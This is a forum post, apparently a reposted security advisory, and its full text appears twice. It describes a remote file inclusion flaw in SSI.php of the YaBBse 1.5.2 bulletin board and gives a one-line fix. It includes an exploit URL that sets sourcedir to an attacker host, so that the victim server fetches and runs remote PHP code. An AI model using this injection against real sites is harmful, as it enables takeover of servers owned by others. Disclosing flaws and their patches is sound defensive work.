CourtneyDS
Baseband Member
- Messages
- 56
Remote code execution in YaBBse 1.5.2 (php version)
======[ Overview
YaBB is widely used bulletin board system.
======[ Problem
One of the files that are included in main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
Name of the file is SSI.php.
Simmilar bug was discovered in previous version YaBB 1.5.1.
SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------
We can define $sourcedir variable through URL and include some other PHP script local or remote if remote inclusion is enabled in php.ini file ...
Bug in not exploitable if PHP's registar_globals is set to off ...
======[ Exploit
Exploit would look like this:
http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com
Attacker would place an Errors.php file on his server ... The code included would get executed on victim's server ...
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim ...
======[ Solution
Add this line before include_once() lines mentioned above.
if (!isset($sourcedir)) $sourcedir = "";
======[ Greetz ]======
Greetz goes to hr.hackers and linux .
Special greetz goes to (rand()): BoyScout, h4z4rd, Çòùrtnèy, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.
** Credit to eLtorO **
Sincerely
CourtneyDS
======[ Overview
YaBB is widely used bulletin board system.
======[ Problem
One of the files that are included in main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
Name of the file is SSI.php.
Simmilar bug was discovered in previous version YaBB 1.5.1.
SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------
We can define $sourcedir variable through URL and include some other PHP script local or remote if remote inclusion is enabled in php.ini file ...
Bug in not exploitable if PHP's registar_globals is set to off ...
======[ Exploit
Exploit would look like this:
http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com
Attacker would place an Errors.php file on his server ... The code included would get executed on victim's server ...
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim ...
======[ Solution
Add this line before include_once() lines mentioned above.
if (!isset($sourcedir)) $sourcedir = "";
======[ Greetz ]======
Greetz goes to hr.hackers and linux .
Special greetz goes to (rand()): BoyScout, h4z4rd, Çòùrtnèy, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.
** Credit to eLtorO **
Sincerely
CourtneyDS